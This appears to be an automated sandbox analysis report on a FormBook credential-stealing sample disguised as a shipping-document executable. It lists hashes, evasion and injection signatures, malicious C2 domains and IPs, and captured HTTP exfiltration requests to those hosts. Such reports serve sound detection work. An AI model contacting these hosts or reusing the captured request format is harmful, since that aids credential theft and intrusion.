Windows Analysis Report
PI & PACKING LIST.exe

Overview

General Information

Sample Name: PI & PACKING LIST.exe
Analysis ID: 756334
MD5: 36fbb21511e87e8dddc8916cc2dc9367
SHA1: eda2fa3fe4b62fe3d564cf492cc31a875e8f1922
SHA256: 937c7c476bb363e55fdf1ff275c87de91ec0f550072e9a759387cc95e6c78c83
Tags: exeformbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: PI & PACKING LIST.exe ReversingLabs: Detection: 76%
Source: PI & PACKING LIST.exe Virustotal: Detection: 57% Perma Link
Yara detected FormBook
Source: Yara match File source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.cpitherapy.com/m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48 Avira URL Cloud: Label: malware
Source: http://www.zkjk888.com/m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48 Avira URL Cloud: Label: malware
Source: http://www.bengalindex.com/m5oe/ Avira URL Cloud: Label: malware
Source: http://www.nu2uresale.store/m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48 Avira URL Cloud: Label: malware
Source: http://www.nu2uresale.store/m5oe/ Avira URL Cloud: Label: malware
Source: http://www.p-soils.com/m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48 Avira URL Cloud: Label: malware
Source: http://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48 Avira URL Cloud: Label: malware
Source: http://www.p-soils.com/m5oe/ Avira URL Cloud: Label: malware
Source: http://www.cpitherapy.com/m5oe/ Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: PI & PACKING LIST.exe Joe Sandbox ML: detected
Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.singglostudio.com/m5oe/"]}
Uses 32bit PE files
Source: PI & PACKING LIST.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PI & PACKING LIST.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PI & PACKING LIST.exe, PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 35.78.89.117 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.43.120.154 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 142.250.203.115 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.bengalindex.com
Source: C:\Windows\explorer.exe Domain query: www.nu2uresale.store
Source: C:\Windows\explorer.exe Network Connect: 209.99.64.33 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.zkjk888.com
Source: C:\Windows\explorer.exe Network Connect: 178.128.239.245 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.p-soils.com
Source: C:\Windows\explorer.exe Domain query: www.cpitherapy.com
Source: C:\Windows\explorer.exe Domain query: www.gebouwpas.online
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.singglostudio.com/m5oe/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.zkjk888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.cpitherapy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.p-soils.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.bengalindex.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.nu2uresale.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.cpitherapy.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.cpitherapy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cpitherapy.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 48 66 46 55 75 59 66 47 6f 41 36 38 37 5f 73 34 4d 6c 67 48 78 4f 42 34 6c 5a 30 4e 6d 37 6a 72 4b 34 71 4a 48 45 36 63 78 34 47 33 69 4b 64 52 45 70 44 54 28 78 50 6f 66 61 6c 57 61 75 43 6f 4f 58 48 42 65 69 37 48 45 36 30 67 44 4e 41 6d 31 4e 78 32 58 61 34 63 63 64 77 33 43 64 48 61 77 6f 54 35 43 47 7a 5a 51 78 56 49 38 46 71 5f 34 76 6c 57 6d 62 35 36 6d 71 48 6c 74 70 66 6d 69 58 72 36 56 31 70 6b 4d 41 48 77 4f 70 6f 51 6f 61 63 61 72 33 77 6a 4a 64 4a 56 41 33 32 5a 47 32 67 6b 6f 6f 34 49 4c 69 28 49 37 32 43 45 5a 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: l48xI=HfFUuYfGoA687_s4MlgHxOB4lZ0Nm7jrK4qJHE6cx4G3iKdREpDT(xPofalWauCoOXHBei7HE60gDNAm1Nx2Xa4ccdw3CdHawoT5CGzZQxVI8Fq_4vlWmb56mqHltpfmiXr6V1pkMAHwOpoQoacar3wjJdJVA32ZG2gkoo4ILi(I72CEZw).
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.cpitherapy.comConnection: closeContent-Length: 5335Cache-Control: no-cacheOrigin: http://www.cpitherapy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cpitherapy.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 48 66 46 55 75 59 66 47 6f 41 36 38 36 66 63 34 4e 47 34 48 6b 65 42 37 67 5a 30 4e 76 62 6a 76 4b 34 6d 4a 48 42 43 32 79 4b 71 33 69 62 4e 52 44 4e 6a 54 6b 78 50 6f 4f 36 6b 64 65 75 44 74 4f 58 36 36 65 6a 4b 38 45 34 34 67 43 66 34 6d 79 74 78 31 56 36 34 49 52 39 77 30 4e 39 48 61 77 6f 65 57 43 48 79 73 51 78 64 49 38 33 69 5f 34 74 39 5a 6d 4c 35 42 70 4b 48 6c 74 70 44 58 69 58 72 41 56 31 51 76 4d 42 6e 77 63 4b 77 51 6b 72 63 56 73 6e 77 67 44 39 49 59 50 45 72 4c 41 45 73 56 67 75 30 4e 63 6e 57 4a 37 43 54 39 4e 6a 41 49 57 4d 59 38 4b 59 4b 46 38 35 44 4d 5a 51 59 68 38 50 6d 6f 59 50 4d 75 57 43 73 74 36 64 68 38 74 2d 59 53 36 48 56 4c 76 54 65 70 58 74 66 7a 6f 35 49 66 45 4f 63 6a 78 35 6f 46 30 61 35 50 6d 73 57 54 37 62 64 41 77 31 38 46 56 36 53 49 38 79 59 71 28 77 75 4b 7a 2d 68 71 32 65 71 4b 4b 51 56 5a 41 46 6c 75 39 59 6d 31 5a 74 69 45 6e 4d 7e 51 77 30 35 54 79 73 5a 67 52 7a 4b 4e 47 66 78 33 76 6f 4b 53 6d 74 70 50 32 59 53 44 44 61 33 79 4c 45 6f 73 61 4e 4f 2d 37 53 78 58 73 6c 35 71 57 4a 71 67 6a 70 59 52 33 57 4c 54 54 79 6f 6e 58 45 47 6d 5a 33 79 69 69 37 42 36 6b 47 4f 65 76 30 76 4c 30 34 6c 74 62 53 55 65 48 69 6b 73 36 6c 49 54 49 73 57 5a 7a 51 32 65 4e 48 76 72 6d 6d 70 73 43 73 77 68 7e 55 71 36 56 35 74 50 4a 55 4f 58 67 6b 78 59 77 49 43 2d 47 41 51 69 50 4d 38 53 6f 50 70 4a 39 37 61 54 38 34 6b 36 76 4d 51 4f 32 32 46 42 6e 50 4c 52 70 5a 34 44 5a 64 30 65 6a 6b 6f 6b 35 47 58 4c 6c 47 59 55 49 47 28 53 51 38 6a 5a 74 66 64 4c 35 66 4d 69 72 6a 53 6f 53 33 33 55 6a 4e 58 5a 47 74 34 4a 53 62 44 4c 5a 50 5a 54 48 54 6c 30 57 43 6d 5f 28 41 5a 31 6a 47 59 47 53 4c 4d 44 53 4d 68 30 36 63 63 53 34 68 6c 75 6d 70 43 31 46 52 39 68 58 74 68 54 57 37 49 67 6c 4c 46 66 64 6f 36 49 79 43 71 64 38 6f 47 4e 4f 72 4d 65 57 58 73 70 4a 58 4a 4c 4c 71 45 51 48 38 31 6d 31 5a 5a 58 38 51 6b 44 36 58 6f 47 56 63 69 6c 36 4d 6d 58 6c 71 47 35 42 2d 53 4d 56 67 35 72 38 42 51 4a 59 70 72 44 6c 6a 47 55 51 74 57 79 6c 37 38 54 4c 45 49 66 31 33 76 7a 78 39 41 35 41 4f 50 37 75 2d 66 79 7e 56 52 78 62 35 63 56 53 63 74 51 4b 4c 70 59 48 64 32 52 4f 31 79 59 6a 6e 46 2d 6b 59 67 35 4b 43 63 36 79 31 71 71 44 51 51 33 6d 6b 72 4f 53 65 69 2d 7e 6f 53 75 7a 33 35 73 33 71 68 52 79 75 37 73 63 78 6a 36 75 46 57 52 66 38 79 47 7a 5a 48 36 66 70 35 46 47 79 31 66 67 57 50 65 63 53 4a 39 30 30 28 7a 76 68 62 6a 67 64 79 72 4c 42 4f 33 53 55 61 7a 7e 7a 56 7a 33 57 44 42 54 64 55 45 6e 77 73 54 45 69 46 53 49 71 6c 50 47 75 4e 56 6c 4a 51 71 38 72 7e 37 58 5f 70 58 6f 69 78 70 31 39 69 55 58 64 39 33 78 5f 6
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.p-soils.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.p-soils.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.p-soils.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 44 69 7a 30 4b 45 43 77 56 65 4a 57 66 66 65 6d 4a 33 62 33 47 78 48 4b 58 75 6e 49 56 6d 31 33 70 6f 44 34 4c 6c 46 46 51 75 33 33 41 59 45 72 65 38 39 31 46 72 7e 61 55 49 31 37 31 32 76 6b 77 4c 54 48 6e 48 6d 53 6f 72 43 49 6a 34 42 36 37 6a 41 44 4e 61 51 30 7a 2d 6c 4d 4b 48 46 62 30 58 4d 66 36 67 57 66 7e 67 62 6c 4c 58 76 6c 41 36 64 57 6c 4a 64 56 7e 61 6f 37 34 6e 4a 79 69 30 68 52 32 6e 30 33 76 34 77 6f 43 6a 7e 70 78 72 4d 79 75 6e 37 53 49 53 57 5f 59 67 52 46 37 7a 72 54 6e 61 56 36 73 6e 77 50 5a 32 75 49 34 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: l48xI=Diz0KECwVeJWffemJ3b3GxHKXunIVm13poD4LlFFQu33AYEre891Fr~aUI1712vkwLTHnHmSorCIj4B67jADNaQ0z-lMKHFb0XMf6gWf~gblLXvlA6dWlJdV~ao74nJyi0hR2n03v4woCj~pxrMyun7SISW_YgRF7zrTnaV6snwPZ2uI4w).
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.p-soils.comConnection: closeContent-Length: 5335Cache-Control: no-cacheOrigin: http://www.p-soils.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.p-soils.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 44 69 7a 30 4b 45 43 77 56 65 4a 57 66 2d 75 6d 4b 51 76 33 52 68 47 34 62 4f 6e 49 65 47 30 38 70 6f 50 34 4c 6e 6f 65 51 63 37 33 44 4b 73 72 5a 66 56 31 44 72 7e 61 42 59 31 5f 28 57 76 79 77 49 75 38 6e 46 4f 6b 6f 74 61 49 69 71 70 36 28 44 41 41 4f 36 51 31 79 4f 6b 61 53 6e 46 62 30 58 4a 6a 36 68 57 50 7e 67 6a 6c 4c 45 33 6c 41 38 4a 56 33 70 64 55 79 36 6f 37 34 6e 56 78 69 30 67 6d 32 6e 74 73 76 35 51 6f 44 32 36 70 69 75 67 74 70 33 37 56 42 79 58 39 52 79 73 63 28 67 6a 55 69 4a 5a 5f 75 53 52 59 4e 56 53 44 74 47 41 46 44 6c 41 79 4a 39 73 45 6d 7a 47 6a 73 38 47 51 59 64 5a 38 45 73 32 2d 37 65 58 71 51 72 33 65 52 63 4d 38 39 50 47 31 64 56 78 63 6e 53 39 4b 4f 70 79 74 30 55 61 69 54 5a 52 37 6c 41 65 36 78 55 63 70 5a 5a 66 49 37 4d 67 71 38 53 34 41 56 68 59 50 78 36 66 37 39 49 69 45 75 36 4f 61 67 50 7a 4c 32 73 41 6a 56 66 4c 56 65 76 38 66 6a 4b 70 43 47 6c 46 77 69 6e 68 52 52 4e 4a 58 69 57 50 78 43 31 77 41 45 58 63 6d 59 71 78 70 75 4f 58 55 4a 44 36 35 79 7a 38 39 31 43 46 70 71 63 4b 72 43 4a 4b 30 50 36 67 68 39 70 48 73 47 2d 49 51 32 30 56 35 6c 46 36 67 75 30 35 75 6b 4c 77 78 44 44 68 55 79 78 58 45 4b 78 54 6c 32 32 37 30 45 6d 59 73 76 55 30 78 4a 65 30 61 77 52 79 62 30 36 7a 4b 31 5f 66 79 28 46 52 50 31 6c 64 76 6e 72 5a 32 4a 4e 4a 37 50 42 4f 5a 36 5f 75 43 42 55 33 66 69 30 44 46 79 31 76 55 77 65 65 55 6d 4a 32 42 46 4a 70 79 56 51 32 62 6d 4f 7e 43 35 6f 78 4c 62 72 71 6c 52 74 6a 47 4d 49 7a 77 67 4e 28 50 70 67 28 51 34 42 31 55 71 31 51 33 6c 76 52 6d 30 51 46 69 70 37 76 37 6f 6f 4d 70 63 6d 77 56 52 79 7e 39 4e 79 37 75 59 73 57 46 74 44 65 46 78 47 31 64 4d 78 43 52 33 33 54 76 37 79 73 2d 7a 67 4d 69 44 38 77 72 72 77 58 33 49 42 39 74 55 38 70 75 4c 66 74 31 5a 57 77 74 63 63 55 74 45 37 34 49 36 50 56 56 45 35 6d 44 62 70 31 43 38 70 6b 35 6a 68 6e 59 69 43 65 52 63 77 70 52 28 44 6d 53 69 69 58 74 44 4a 54 5a 38 74 65 79 59 76 39 6f 70 76 4c 5f 72 6f 57 32 39 48 56 66 68 44 6a 68 38 74 79 77 49 65 33 63 47 34 36 65 6a 6c 34 55 36 59 57 79 71 34 77 75 76 70 30 6c 34 4e 45 71 77 65 49 73 6d 45 7e 6f 30 74 6d 56 4a 74 34 2d 6c 43 64 69 57 2d 6b 45 50 4e 48 57 57 69 4d 68 70 33 6b 48 78 35 78 6e 74 39 57 52 73 62 61 49 4a 56 7a 63 70 6a 4b 41 77 37 64 6a 4a 6e 5a 72 74 56 45 64 34 65 75 77 69 4d 6d 42 56 48 59 4f 67 42 77 77 59 6f 69 56 47 31 6a 65 55 68 54 68 4b 32 4a 67 4a 54 48 6d 36 39 64 34 4c 4e 78 68 53 31 50 6f 6f 75 62 62 6d 54 4d 42 4c 42 38 66 67 30 71 39 4d 5f 6c 57 49 51 7a 46 63 4b 7a 57 36 73 4e 70 6c 4b 51 44 6a 68 38 78 57 69 46 67 6c 7a 28 6d 74 62 52 36 6c 44 6d 74 35 6
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.bengalindex.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.bengalindex.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bengalindex.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 28 70 34 46 61 58 6e 62 4c 56 54 41 57 64 43 51 54 77 72 6b 31 4b 36 2d 6f 7a 66 4a 37 4e 64 30 48 39 4d 6c 76 50 77 64 63 62 32 33 50 6e 34 4d 4d 72 43 56 6a 64 6c 45 31 35 62 33 65 34 31 57 5a 50 61 61 42 67 45 77 62 57 5a 71 30 43 7e 43 57 43 72 61 65 49 34 6d 51 4d 38 63 49 7a 34 77 77 36 30 65 58 56 51 6d 35 57 79 53 42 78 48 66 4c 73 43 68 70 4f 55 6b 54 39 28 52 68 68 31 70 45 49 7a 73 52 78 54 46 46 4d 58 4e 46 4d 68 79 6c 6f 4a 46 61 65 65 67 54 65 6c 33 4e 42 77 58 50 42 52 6e 42 4f 78 68 63 76 72 67 6b 78 41 50 7e 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: l48xI=(p4FaXnbLVTAWdCQTwrk1K6-ozfJ7Nd0H9MlvPwdcb23Pn4MMrCVjdlE15b3e41WZPaaBgEwbWZq0C~CWCraeI4mQM8cIz4ww60eXVQm5WySBxHfLsChpOUkT9(Rhh1pEIzsRxTFFMXNFMhyloJFaeegTel3NBwXPBRnBOxhcvrgkxAP~w).
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.bengalindex.comConnection: closeContent-Length: 5335Cache-Control: no-cacheOrigin: http://www.bengalindex.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bengalindex.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 28 70 34 46 61 58 6e 62 4c 56 54 41 57 2d 61 51 66 33 28 6b 6b 71 36 5f 78 44 66 4a 77 74 64 4b 48 39 49 6c 76 50 59 4e 66 74 4f 33 42 56 51 4d 4e 49 71 56 68 64 6c 45 6b 70 62 7a 42 6f 30 4e 5a 50 4f 38 42 69 4d 5f 62 55 31 71 79 41 32 43 42 53 72 62 58 49 34 37 44 38 38 66 57 44 34 77 77 36 34 6f 58 58 34 63 35 57 71 53 41 47 48 66 4c 75 71 2d 76 65 55 6e 4d 4e 28 52 68 68 70 79 45 49 79 52 52 78 72 72 46 4d 33 4e 58 71 4e 79 32 4e 39 47 4e 65 66 6f 65 2d 6b 61 4d 78 67 65 61 67 70 4b 4c 5f 64 67 62 34 6e 79 73 68 56 6f 69 49 32 4d 52 6f 52 41 57 76 41 36 30 2d 41 4b 73 6d 74 50 38 4a 71 68 66 5a 30 45 28 6e 69 6f 4d 55 35 46 69 62 65 38 52 35 75 64 5a 48 4e 72 73 51 41 41 54 79 52 58 41 4f 70 35 34 6b 28 66 55 71 63 6e 42 43 79 74 46 2d 73 66 63 4e 33 6f 5a 5a 6a 61 5a 50 6d 41 43 61 28 35 32 36 4c 78 5a 68 66 62 7e 7a 51 52 75 46 74 55 38 43 76 73 62 6d 77 51 4c 53 70 4e 45 4a 68 68 78 43 36 52 45 6c 6f 31 28 43 4e 51 32 6b 6e 5a 46 73 41 53 78 36 41 59 43 41 72 62 4d 6f 6b 77 74 4f 6e 71 57 58 67 38 66 78 4e 32 78 6c 28 45 52 5a 38 70 33 2d 76 59 6b 51 51 41 66 73 7e 55 7e 4f 4f 41 36 6e 74 4a 41 64 77 77 35 6e 67 48 45 6f 38 75 49 62 4a 33 6e 67 76 76 33 74 58 63 73 6c 30 45 53 64 41 67 57 6e 62 74 63 30 49 65 38 30 6d 79 77 7a 68 42 4f 71 66 77 74 55 6f 36 68 51 5a 32 77 45 32 45 63 52 65 33 36 5f 63 54 53 70 79 70 61 48 7e 53 58 7a 55 55 5a 4b 39 78 32 5f 42 6b 52 2d 36 79 37 41 48 62 52 61 77 54 63 6e 45 5f 59 38 68 68 39 61 6e 6b 6f 6f 4f 52 33 30 63 77 70 76 64 47 69 38 63 35 35 69 48 41 67 47 35 2d 4f 2d 38 61 30 48 73 62 6c 30 56 6c 44 35 48 6b 52 47 4a 35 6f 62 46 64 78 39 6b 55 59 4b 28 70 69 70 28 74 71 63 4a 76 41 72 76 35 6a 5f 4d 51 45 6e 39 30 59 38 6e 69 45 69 30 70 7e 6a 6f 48 51 74 63 71 6b 2d 6a 2d 5a 6e 4c 5a 44 48 39 78 6a 77 74 75 49 4e 6f 36 78 50 44 67 38 6b 53 37 28 4e 46 74 74 58 47 36 37 30 43 45 7e 4e 69 73 66 36 74 51 7a 79 65 5f 5a 55 79 65 43 53 44 4c 30 66 65 52 76 39 42 66 71 34 74 38 45 67 4b 61 68 4d 78 62 77 6f 64 34 4d 4f 45 58 51 71 71 47 48 34 42 32 6d 72 31 44 47 35 30 30 4f 78 62 63 52 43 62 32 59 57 66 6b 41 6d 31 46 53 75 46 6f 49 31 39 6b 58 65 45 7a 4d 76 6c 5f 31 38 72 52 64 65 37 33 79 58 43 5a 47 45 45 78 76 69 62 52 32 6e 6e 34 71 6d 50 4f 58 70 43 78 6c 32 43 53 5a 42 78 49 64 58 4d 63 30 73 52 6c 4c 67 48 73 4e 36 48 73 45 50 78 31 48 50 6e 4b 37 6f 71 56 65 61 46 30 48 70 77 67 4a 43 78 69 37 61 36 66 32 56 51 47 37 59 54 6e 55 64 57 7a 52 2d 34 76 75 6d 4e 46 41 5f 54 73 61 4f 37 2d 59 47 33 30 65 6b 75 37 39 6b 69 57 30 4e 77 5f 47 33 4f 45 54 5f 61 45 6c 5a 4d 49 56 6
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.nu2uresale.storeConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.nu2uresale.storeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nu2uresale.store/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 5a 5f 57 38 68 71 47 6b 71 72 46 4f 59 48 65 6e 30 4b 79 63 64 5a 4e 49 56 7a 37 67 38 45 69 4b 56 70 48 48 6c 35 39 57 7e 57 7e 66 50 36 62 79 46 39 43 6c 66 66 62 55 71 58 66 6f 65 38 69 39 6b 56 65 74 69 6c 33 2d 53 6b 56 6c 61 52 6b 32 69 63 67 58 35 78 66 31 36 67 67 71 43 47 6f 5a 44 37 56 46 74 61 59 37 37 33 55 6f 30 78 6b 74 63 39 58 51 62 57 75 72 44 4c 4f 34 44 65 6a 6d 4d 2d 33 54 35 5a 49 65 44 64 41 65 79 33 5a 78 77 48 4a 6c 5a 64 69 55 42 67 6e 2d 4c 66 53 70 4c 46 6d 54 39 43 68 6a 4d 42 6e 76 30 6c 68 7a 42 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: l48xI=Z_W8hqGkqrFOYHen0KycdZNIVz7g8EiKVpHHl59W~W~fP6byF9ClffbUqXfoe8i9kVetil3-SkVlaRk2icgX5xf16ggqCGoZD7VFtaY773Uo0xktc9XQbWurDLO4DejmM-3T5ZIeDdAey3ZxwHJlZdiUBgn-LfSpLFmT9ChjMBnv0lhzBw).
